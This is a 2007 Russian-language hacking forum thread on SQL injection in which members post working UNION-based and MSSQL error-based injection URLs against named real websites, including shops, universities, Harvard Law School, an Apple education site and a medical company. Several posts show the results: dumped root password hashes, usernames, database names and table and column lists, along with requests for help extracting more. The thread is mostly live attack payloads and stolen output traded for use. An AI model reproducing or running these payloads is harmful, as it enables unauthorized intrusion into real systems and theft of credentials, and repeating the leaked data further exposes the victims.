SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Получите - распишитесь :)

    Code:
    http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,3,4,concat_ws(char(58),username,password,salt,email,icq,skype)+from+vbuser/*
     
    1 person likes this.
  2. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Вот пароль :)

    Code:
    http://www.buybrand.ru/rus/index/news?id=-1%20union%20select%201,2,name,4,5,passw,7,8+from%20users/*
     
    1 person likes this.
  3. md5f1h

    md5f1h Member

    Joined:
    26 Jan 2007
    Messages:
    14
    Likes Received:
    8
    Reputations:
    0
    первые два связаны с la2
    http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/*
    http://www.akatsuki.asturservers.com/open-L2DP/item.php?id=-1+Union+select+1,2,3,TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+LIMIT+2,1/*
    http://www.books.bg/Item.php?id=-1+union+select+user()/*
     
  4. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Code:
    http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,concat_ws(0x203a20,user,password),3,4,5+from+mysql.user/*
    
    root : 1be122933e65c0f2
    ;-)
     
  5. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    дальше подобрать не могу... кто сможет с меня ++ (оч надо)...
     
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Дык
    http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,concat(login_user,0x3a,password_user),8,9,10+from+user/*
     
    1 person likes this.
  7. V1p-eR

    V1p-eR Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    Code:
    http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
    [email protected]:bugs:5.0.18-log
    Code:
    http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,db),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.db/*
    есть база даных; asystem
    Code:
    http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
    root:*97EB633C4A82BD6AE86EB0CA129D2CD0CBF93228
     
    1 person likes this.
  8. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    (пароли md5 (unix))
     
  9. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    ПАССЫ В МД5
    Логины но почему-то страничка не отвечает:(
     
  10. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Таблицы не подобрал :(
    Code:
    http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
     
  11. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Y.Dmitriy, limit поюзай и все будет открываться
    Code:
    http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,login,9,10+from+users+limit+2,1/*[code]
     
  12. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Code:
    http://kipelov.ru/ly.php?idtxt=-1+union+select+2,3,4/*
    :))
     
    1 person likes this.
  13. anakreon

    anakreon Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Сайтег Гарварда...
    Code:
    http://www.law.harvard.edu/faculty/directory/facdir.php?id=20+union+select+user(),database()/*
    facdir@localhost: academics
     
    #2673 anakreon, 10 Jul 2007
    Last edited: 10 Jul 2007
  14. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
    !!!!СЦУКО НЕНАВИЖУ!!!
     
  15. helat

    helat Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    166
    Likes Received:
    45
    Reputations:
    5
    Ещё бы пасс.
    Супер
     
  16. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    http://asun.unl.edu/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15/*
    вот подобрал колонки!
     
    #2676 z01b, 10 Jul 2007
    Last edited: 10 Jul 2007
  17. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12+from+information_schema.columns/*/
     
  18. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/*
    http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/*

    P.S.:
    как можно обойти это:
    Code:
    http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*
     
  19. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    MsSql:

    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@version--
    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+db_name())--
    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+system_user)--

    Таблицы:
    D99_Tmp
    Category
    D99_CMD
    Dic_BodyPart
    Dic_HX
    Dic_Language
    Dic_State
    Dic_Test
    dtproperties
    ip
    Message
    Rights
    Role
    SessionAction
    SessionLog
    Siwebtmp
    Subscriber
    sysconstraints
    syssegments
    systables
    User
    v_Category
    v_Rights
    v_SessionActions

    Нашел все колонки в таблице User:
    ID
    RoleRef
    System
    Name
    Password
    FirstName
    LastName
    EMail

    Не получилось последнее:
    Code:
    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)--
    Как реализовать?
     
    #2679 Dr.Frank, 11 Jul 2007
    Last edited: 11 Jul 2007
  20. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Code:
    http://www.ofmusic.ru/mat/index.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.columns/*&mid=796
     
Thread Status:
Not open for further replies.